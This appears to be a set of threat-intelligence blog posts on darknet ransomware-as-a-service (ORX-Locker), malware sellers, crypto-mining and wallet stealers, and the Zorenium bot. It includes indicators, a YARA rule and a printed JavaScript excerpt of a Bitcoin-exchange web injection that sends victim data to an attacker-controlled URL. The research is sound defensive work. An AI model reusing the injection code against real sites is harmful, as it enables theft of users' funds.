Growing Awareness of the Darknet in China Following Huge Domestic Database Breaches

In recent weeks, we have identified a growing awareness on Chinese security blogs and mainstream media, to the existence of the Darknet, and the activities of Chinese users on its platforms. The focus is mostly on the sale of leaked data, mainly of Chinese citizens. One of these leaks pertained to the Huazhu hotel group, and was one of two major data breaches that occurred simultaneously in China, raising awareness to this issue. The second breach was the database of SF Express, a delivery service company based in Shenzhen, Guangdong Province. Continue reading “Growing Awareness of the Darknet in China Following Huge Domestic Database Breaches”

Sharp Rise in Mining-Related Malware on the Russian-speaking Underground

Verint’s powerful portfolio of interception and monitoring solutions provides full monitoring and operational value. Dedicated systems address separate real-time and retroactive investigation needs, for lawful monitoring, field operations and background research. In the case below, we have used our Cyber and Webint suite to constantly monitor, collect and analyze malware-related items, to gain actionable intelligence and perform the investigation. Continue reading “Sharp Rise in Mining-Related Malware on the Russian-speaking Underground”

ORX-Locker – A Darknet Ransomware That Even Your Grandmother Can Use

Written by Ran L. and Mickael S.

The bar for becoming a cyber-criminal has never been so low. Whether buying off-the-shelf malware or writing your own, with a small investment, anyone can make a profit. Now it seems that the bar has been lowered even further with the creation of a new Darknet site that offers Ransomware-as-a-Service (RaaS), titled ORX-Locker.

Ransomware-as-a-Service enables a user with no knowledge or cash to create his own stubs and use them to infect systems. If the victim decides to pay, the ransom goes to the service provider, who takes a percent of the payment and forwards the rest to the user. For cyber-criminals, this is a win-win situation. The user who cannot afford to buy the ransomware or does not have the requisite knowledge can acquire it for free, and the creator gets his ransomware spread without any effort from his side.

This is not the first time we have seen this kind of service. McAfee previously (May, 2015) reported on Tox. While Tox was the first ransomware-as-a-service, it seems that ORX has taken the idea one step further, with AV evasion methods and complex communication techniques, and apparently also using universities and other platforms as its infrastructure.

In the “August 2015 IBM Security IBM X-Force Threat Intelligence Quarterly, 3Q 2015,” published on Monday (August 24, 2015), IBM mentioned TOX while predicting: “This simplicity may spread rapidly to more sophisticated but less common ransomware attack paradigms and lead to off-the-shelf offerings in the cloud.” Just one day later, a post was published on a closed Darknet forum regarding the new ORX-Locker service.

ORX – First Appearance

On August 25, 2015, a user dubbed orxteam published a post regarding the new ransomware service. The message, which was part of his introduction post – a mandatory post every new user has to make to be accepted to the forum – described the new ORX-Locker ransomware as a service platform. In the introduction, the user presented himself as Team ORX, a group that provides private locker software (their name for ransomware) and also ransomware-as-a-service platform.

ORX team introduction post in a closed Darknet hacking forum.
ORX Team introduction post in a closed Darknet hacking forum.

ORX Locker Online Platform

Team ORX has built a Darknet website dedicated to the new public service. To enter the site, new users just need to register. No email or other identification details are required. Upon registration, users have the option to enter a referral username, which will earn them three percent from every payment made to the new user. After logging in, the user can move between five sections:

Home – the welcome screen where you users can see statistics on how much system has been locked by their ransom, how many victims decided to pay, how much they earned and their current balance.

Build EXE – Team ORX has made the process of creating a stub so simple that the only thing a user needs to do is to enter an ID number for his stub (5 digits max) and the ransom price (ORX put a minimum of $75). After that, the user clicks on the Build EXE button and the stub is created and presented in a table with all other stubs previously created by the user.

ORX-Locker Darknet platform, which enables every registered user to build his own ransomware stub.
ORX-Locker Darknet platform, which enables every registered user to build his own ransomware stub.

Stats – This section presents the user with information on systems infected with his stub, including the system OS, how many files have been encrypted, time and date of infection, how much profit has been generated by each system, etc.

Wallet – following a successful infection, the user can withdraw his earnings and transfer them to a Bitcoin address of his choosing.

Support – This section provides general information on the service, including more information on how to build the stub and a mail address (orxsupport@safe-mail[.]net) that users can contact if they require support.

Ransomware

When a user downloads the created stub, he gets a zip file containing the stub, in the form of an “.exe” file. Both the zip and the stub names consist of a random string, 20-characters long. Each file has a different name.

Once executed, the ransomware starts communicating with various IP addresses. The following is a sample from our analysis:

  1. 130[.]75[.]81[.]251 – Leibniz University of Hanover
  2. 130[.]149[.]200[.]12 – Technical University of Berlin
  3. 171[.]25[.]193[.]9 – DFRI (Swedish non-profit and non-party organization working for digital rights)
  4. 199[.]254[.]238[.]52 – Riseup (Riseup provides online communication tools for people and groups working on liberatory social change)

As you can see, some of the addresses are related to universities and others to organizations with various agendas.

Upon activation, the ransomware connects to the official TOR project website and downloads the TOR client. The malware then transmits data over this channel. Using hidden services for communication is a trend that has been adopted by most known ransomware tools in the last year, as was the case of Cryptowall 3.0. In our analysis, the communication was over the standard 9050 port and over 49201.

The final piece would be the encryption of files on the victim’s machine. Unlike other, more “target oriented” ransomware, this particular one locks all files, changing the file ending to .LOCKED and deletes the originals.

When the ransomware finishes encrypting the files, a message will popup announcing that all the files were encrypted, and a payment instruction file will be created on the desktop.

After the ransomware finishes encrypting the files, a message will popup announcing that all the files were encrypted
After the ransomware finishes encrypting the files, a message will popup announcing that all the files were encrypted

In the payment instruction file (.html), the victim receives a unique payment ID and a link to the payment website, located on the onion network (rkcgwcsfwhvuvgli[.]onion). After entering the site using the payment ID, the victim receives another set of instructions in order to complete the payment.

ORX-Locker payment platform which has a dedicated site located on the onion network.
ORX-Locker payment platform, which has a dedicated site located on the onion network.

Finally, although some basic persistence and anti-AV mechanisms are present, the malware still has room to “grow.” We are certain that as its popularity grows, more developments and enhancements will follow.

YARA rule:

rule ORXLocker
{
meta:
author = “SenseCy”
date = “30/08/15”
description = “ORXLocker_yara_rule”

strings:
$string0 = {43 61 6e 27 74 20 63 6f 6d 70 6c 65 74 65 20 53 4f 43 4b 53 34 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 25 64 2e 25 64 2e 25 64 2e 25 64 3a 25 64 2e 20 28 25 64 29 2c 20 72 65 71 75 65 73 74 20 72 65 6a 65 63 74 65 64 20 62 65 63 61 75 73 65 20 74 68 65 20 63 6c 69 65 6e 74 20 70 72 6f 67 72 61 6d 20 61 6e 64 20 69 64 65 6e 74 64 20 72 65 70 6f 72 74 20 64 69 66 66 65 72 65 6e 74 20 75 73 65 72 2d 69 64 73 2e}
$string1 = {43 61 6e 27 74 20 63 6f 6d 70 6c 65 74 65 20 53 4f 43 4b 53 35 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 30 32 78 25 30 32 78 3a 25 64 2e 20 28 25 64 29}
$string2 = {53 4f 43 4b 53 35 3a 20 73 65 72 76 65 72 20 72 65 73 6f 6c 76 69 6e 67 20 64 69 73 61 62 6c 65 64 20 66 6f 72 20 68 6f 73 74 6e 61 6d 65 73 20 6f 66 20 6c 65 6e 67 74 68 20 3e 20 32 35 35 20 5b 61 63 74 75 61 6c 20 6c 65 6e 3d 25 7a 75 5d}
$string3 = {50 72 6f 78 79 20 43 4f 4e 4e 45 43 54 20 66 6f 6c 6c 6f 77 65 64 20 62 79 20 25 7a 64 20 62 79 74 65 73 20 6f 66 20 6f 70 61 71 75 65 20 64 61 74 61 2e 20 44 61 74 61 20 69 67 6e 6f 72 65 64 20 28 6b 6e 6f 77 6e 20 62 75 67 20 23 33 39 29}
$string4 = {3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 72 6b 63 67 77 63 73 66 77 68 76 75 76 67 6c 69 2e 74 6f 72 32 77 65 62 2e 6f 72 67 3e 68 74 74 70 73 3a 2f 2f 72 6b 63 67 77 63 73 66 77 68 76 75 76 67 6c 69 2e 74 6f 72 32 77 65 62 2e 6f 72 67 3c 2f 61 3e 3c 62 72 3e}
$string5 = {43 3a 5c 44 65 76 5c 46 69 6e 61 6c 5c 52 65 6c 65 61 73 65 5c 6d 61 69 6e 2e 70 64 62}
$string6 = {2e 3f 41 56 3f 24 62 61 73 69 63 5f 6f 66 73 74 72 65 61 6d 40 44 55 3f 24 63 68 61 72 5f 74 72 61 69 74 73 40 44 40 73 74 64 40 40 40 73 74 64 40 40}
$string7 = {2e 3f 41 56 3f 24 62 61 73 69 63 5f 69 6f 73 40 5f 57 55 3f 24 63 68 61 72 5f 74 72 61 69 74 73 40 5f 57 40 73 74 64 40 40 40 73 74 64 40 40}
$string8 = “ttp://4rhfxsrzmzilheyj.onion/get.php?a=” wide
$string9 = “\\Payment-Instructions.htm” wide

condition:
all of them
}

Shell Profiles on the Russian Underground

Russian underground cyber-markets are known venues for purchasing high-quality hacking tools and services. Many such tools, popular worldwide, make their first appearances on closed Russian forums. There are two main types of sellers on these platforms: well-known members with seniority and strong reputations, who have already sold tools and received positive buyer feedback, and an emerging “shell profile” type of user. According to our recent analysis, such users typically register to a forum a few days before posting an advertisement for the tool. These new users often enlist the aid of forum administrators and more senior members, by providing them with a copy of the tool for their review, and thus gain the trust of potential buyers.

CTB-Locker

For example, CTB-Locker, a malware program, was first advertised on a Russian underground forum on June 10, 2014 by a user called Tapkin. This ransomware scans the computer for data files, encrypts them with a unique algorithm, and demands a ransom to release them. Tapkin registered on this forum on June 2, 2014, several days before posting the advertisement, and posted a total of five messages to the forum, all on the subject of CTB-Locker. Around this time, a user by the same name posted identical information on other forums.

Tapkin registered to another Russian underground forum on June 13, 2014, and three days later, he advertised the tool on the forum. This was the first and only thread that Tapkin started on this platform, and all of his posts were about this topic.

Tapkin stopped selling CTB-Locker on June 27, but on November 19, 2014, he posted another advertisement, this time for “serious” clients only. Tapkin last advertised the ransomware on a carding forum on December 8, 2014, after registering to this forum the same day.

Thus, in three cases, Tapkin registered to a forum a few days before posting an advertisement for the tool and did not participate in any other forum discussions. As a newly created profile, Tapkin lacked seniority and therefore had low credibility. However, our impression is that this user demonstrates knowledge regarding the tool, its capabilities and can answer questions regarding the technical component of the tool fluently. An analysis of Tapkin’s posts indicates that behind the shell profile is not one person, but rather a group of people who developed the tool together.

Forum comments indicating the presence of a team behind the username Tapkin
Forum comments indicating the presence of a team behind the username Tapkin

This username appears to have been created for the sole purpose of selling the ransomware, which was only advertised on Russian-speaking platforms. On May 19, 2015, a well-known forum user posted a message stating that his computer had been infected by CTB-Locker and asking for Tapkin. However, Tapkin had by then already disappeared.

Forum member post searching for Tapkin in correlation with CTB-Locker
Forum member post searching for Tapkin in correlation with CTB-Locker

Loki Bot

Another example of malware advertised by a new forum member is the Loki Bot password and coin wallet stealer. Loki Bot, written in C++, can steal passwords from browsers, FTP/SSH applications, email accounts, and poker clients. It has an option to configure C&C IP addresses or domains.

Bot-selling advertisement
Bot-selling advertisement

This bot, which works on Windows versions XP, Vista, 7, 8, and 8.1, is relatively new and is still under development. It was first advertised on a well-known Russian underground forum in early May 2015 by a new user with no reputation. A week later, a user by the same name registered on two other well-known underground forums attempted to boost his credibility by sending the forum administrator a test version of the malware. Similar to the previous example, we assume that a group of people is behind this user as well.

Forum administrator approves a new tool advertised by a “shell profile” user (May 18, 2015)
Forum administrator approves a new tool advertised by a “shell profile” user (May 18, 2015)

We can see that new users are registering on Russian underground forums for one purpose only, to sell a particular malware program, and their entire online presence is focused on this. They register to a forum a few days before posting an advertisement for the tool and do not participate in other forum discussions. Newly created profiles lack seniority and therefore have low credibility ratings. Sometimes such users attempt to improve their credibility by sending the forum administrator a test version of the malware. In some cases we can see that behind the shell profile there is a team, and not an individual. They appear suddenly and disappear just as suddenly after their business is completed.

Exploiting the World of WebMoney

The appearance of virtual money has played in favor of cyber criminals. The level of anonymity provided by crypto currencies is significantly higher than in real money transactions, and leaves much more space for performing illegal activities.

The first and most obvious way to exploit WebMoney and earn an easy profit is to mine virtual currencies via botnets specifically created for the purpose. The underground is awash with different mining bots, miners and mining Trojans for sale (downloads are also available), all of which are designated to infects PCs of naive users and exploit their PC CPU/GPU resources to mine the precious coins. The price range varies widely, starting at $50-$100 for a build of a simple Bitcoin/Litecoin miner, to $400-$500 for more sophisticated malware capable of mining a wider variety of virtual currencies (such as Namecoins, Dogecoins, QuarkCoins, etc.) and reaching $1,000-$1,500 for complete mining kits that can mine coins on processor or video cards, contain UAC bypass and web panel for statistical management of the bots, are signed with a digital certificate, and more.

Litecoin mining Bot
Litecoin mining Bot
"Diamond Axe" - another mining bot
“Diamond Axe” – another mining bot

The abundance of different mining platforms identified over the past year has created some difficulties for those making a living in this area. Prices dropped due to the increase in supply, while in parallel, the miners became more detectable by AV vendors, as a large number of them operate by the same mechanism. We identified forums threads from members looking for alternative methods of money-making, stressing their preference for malware capable of virtual money theft.

This can perhaps shed some light on the shift in the activities of cybercriminals in this area – from creating mining botnets, to stealing coins from web wallets. Indeed, in the last month alone, we identified three different stealers of Bitcoin wallets: *coin Grabber, Stealer coins and Wallet Stealer. While the tools are not very sophisticated, they can cause a great deal of damage. *coin Grabber is designed to steal data (files and passwords) from Bitcoin-QT, MultiBit, Armory and Electrum wallets during the transaction process, and costs $500. Stealer Coins is supposed to search for and steal Bitcoin wallet files and send them to FTP, and is sold for $250. The Wallet Stealer is capable of stealing different kinds of WebMoney (not only Bitcoins) from Armory and MultiBit wallets and bypass UAC, and it costs $600.

The Administration Panel of *coin Grabber
The Administration Panel of *coin Grabber

In conclusion, we should mention again the three injection codes for Bitcoin exchanges that were found on one of the Russian underground forums (we wrote about this in detail about a week ago). This code replaces the values of the send-to-address, send-value and the send button elements, thus exploiting vulnerability on the exchange website.
As time goes by, we are witnessing the evolution of more and more cybercrime tools aimed at the relatively young but very profitable area of web currencies. The simple, easy methods are being abandoned for more complicated ones and new trends are popping up, like in other spheres of the dynamic cyber crime world.

Zorenium Bot: Follow-up

This is a guest post by Dimitry, a forensics expert who will be joining our team soon.

Image

As a follow up to our previous post, here is a quick overview of some of Zorenium’s capabilities.

Please note that as we are still in the process of fully analyzing this bot’s capabilities – the post is mostly based on the information publish by the bot maker.

Without a doubt, one of the most interesting modules to start with would be the FakeShoutDown mechanism. If according to the author indeed it operates as they say it does, then it is definitely a new “way of thinking”.

In essence, the authors of Zorenium are faking the shutdown process of a machine. The code imitates the entire process (once the shutdown sequence isinitiated by the user) including proper images and even, and this is quite fascinating, slowing down the computer fans to eliminate the noise.

In my humble opinion, it is quite impressive.

The bot has multiple interfaces of management (such as IRC and I2P), and all come with a great set of 256 bit AES keys.

Another interesting aspect would be the implementation of the stenography module. The stenography module is not a “regular”, and it makes this bot into more sophisticated than others. I am curious to see how that implementation works.

Another funky aspect of the bot would be what the author called “CHRISTMAS USERKIT4 SPECIAL ADDON”. Amongst the various features, the bot will replicate a new disk drive and will drop the core dll’s onto it. Then it will encrypt the hard drive and thus protect it from various AV and anti-malware mechanisms. Pretty sweet if you ask me.

The cherry on this icecream would be the iOS module. This is definitely the first bot that I have seen that actually operates on “Cross-platforms”. It can infect Android, Windows and iOS systems – a true nightmare to all security specialists. The main question regarding iOS still remains – are only jailbroken phones at risk or is it much, much worse?

Zorenium Bot Coming to the iPhone Nearest to You

Written by Tanya Koyfman and Assaf Keren

Recently our analysts have been monitoring the advancement of a new threat in the commercial malware theater – the Zorenium Bot. Zorenium, a relatively new and unknown bot,  has been for sale on the underground sinceJanuary 2014. This bot will be getting new features in its March 18th update, including, the ability to infect iOS devices (version 5-7), alongside its existing capabilities to run on Linux- and Windows-based machines. The developers have also updated the rootkit to TDL4 (making it vulnerable to anti-TDSS tools).

 zorenium1

Capture of the recent release notifications

Zorenium, a relative of Betabot, is a very robust bot which is still undetected by most AV companies. It has several key abilities, including DDoS, Formgrabbing, Bot-killing, Banking Trojan and Bitcoin mining. The cost of a basic Zorenium bot is 350 GBP and with advanced features (including P2P C&C, i2p C&C and more) it can go up to over 5000GBP.

 zorenium2

Zorenium Payment Plans

According to the developers, it is still in beta mode and more features will be available in time .

 zorenium3

Zorenium Source Screen Capture

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin
Bitcoin

From publicized breaches of Bitcoin trading sites, to wild fluctuations of the its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and  the level of security the exchange site provides. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcon exchange sites, there is a new trend, utilizing the ability of Trojans to hijack http sessions or plain old XSS and CSRF attacks, the attackers are injecting site-specific code to users and then scan for available funds in the user accounts and steal money from the accounts.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way,  and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
var s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.async=false;
s.src = “{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=”+data+”&rnd=”+Math.random();
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == ‘loaded’ || this.readyState == ‘complete’)){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
if(document.getElementsByTagName(‘head’).length){ document.getElementsByTagName(‘head’)[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS setting of the site, and replace the values of the send-to-address, send-value and the send button elements. All in all, this is a very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Weaponization of Cyber Coins – The Next Attack Vector?

Written by Jeremy Jacobson

It’s getting kind of hard to ignore all the buzz surrounding bitcoins these days. The cryptocurrency, which allows users to convene peer-to-peer (P2P) monetary transactions with a significant degree of anonymity, has exploded in value, currently hovering around $900 per bitcoin, leading many to speculate about the long-term viability and implications of cryptocurrencies in general. However, lost amid the debate is serious discussion over the next logical step in the evolution of encrypted P2P currencies: the eventual weaponization of the cyber-coin.

Bitcoin itself has already become a favorite among cyber-criminals. Whether laundering money, selling drugs (remember Silk Road?) or procuring the services of a hit man, the ability to anonymously carry out monetary transactions over the Internet has made online crime both easy and relatively risk free. This, and the fact that at least 2,600 stores accept bitcoins worldwide (as do the Sacremento Kings basketball team) according to Robert J. Samuelson of the Washington Post, has led to the massive inflation in Bitcoin’s value, and has attracted investors looking for an easy payday.

Bitcoin

Like any good idea, Bitcoin has also attracted numerous imitations, which have resulted in cryptocurrencies ranging from the very serious to the Bizarre. For example, Litecoin is a cryptocurrency almost identical to Bitcoin that purports to incorporate three main improvements over the Bitcoin software. In contrast, the Dogecoin plays off the popularity of the “Doge” meme, which was rated 2013’s meme of the year, while the Coinye cryptocurrency uses the likeness of rapper and pop-culture icon Kanye West to market its brand (West’s lawyers are still attempting to shut the coin down). According to Carlotte Lyton of the Daily Beast, there are at least 71 types of crypto currencies out there, some of which are suspiciously reminiscent of the old Wall Street pump-and-dump scheme.

Enter Allahcoin. This P2P Islamic currency offers similar software to Bitcoin, but with a couple of modifications. One new feature is that for every Allahcoin mined, 10% will be donated to the Muslim Brotherhood foundation. This coin not only offers a brand new cryptocurrency, but an easy and anonymous way for users to donate to their favorite Islamist organization!

The Muslim Brotherhood  does not fit the traditional definition of a terrorist organization. However, it may not be long before jihadist groups with ties to the Brotherhood, or similar-minded groups, catch on to the advantages of the nascent crytocurrency technology. Although, like criminals, fundraising and money laundering are the most obvious benefits for such groups, it is possible that terrorists could one day weaponize their own crypto currency.

How would a weaponized cryptocurrency work? It is hard to say exactly, but current abuses of alternative cryptocurrencies may hint at an answer. For instance, some currencies are designed suspiciously similar to pump-and-dump schemes. An attacker could disperse a virus-laced currency in an identical fashion at the investment scheme’s pump phase. After sufficiently spreading the currency, the attacker could activate a trigger, spreading a virus through users’ virtual wallets. Depending on the type of attack, the virus could expose users’ identities, neutralize their virtual wallets, rip off their accounts, or steal information from their networks. In a worst case scenario, terrorists may target tech contractors and infect their computers and online accounts via the currency, thus increasing the possibility of the virus transferring to their clients’ networks (similar to how the Stuxnet virus may have been transferred to an Iranian nuclear facility, according to Ralph Langner writing in Foreign Policy).

Just as P2P file sharing through software such as Limewire and eMule eventually became natural habitats for the spread of viruses, it is likely that cryptocurrencies will one day be weaponized. The question is not if, but when the first attacks will occur, who will be behind them, and how much damage will they cause.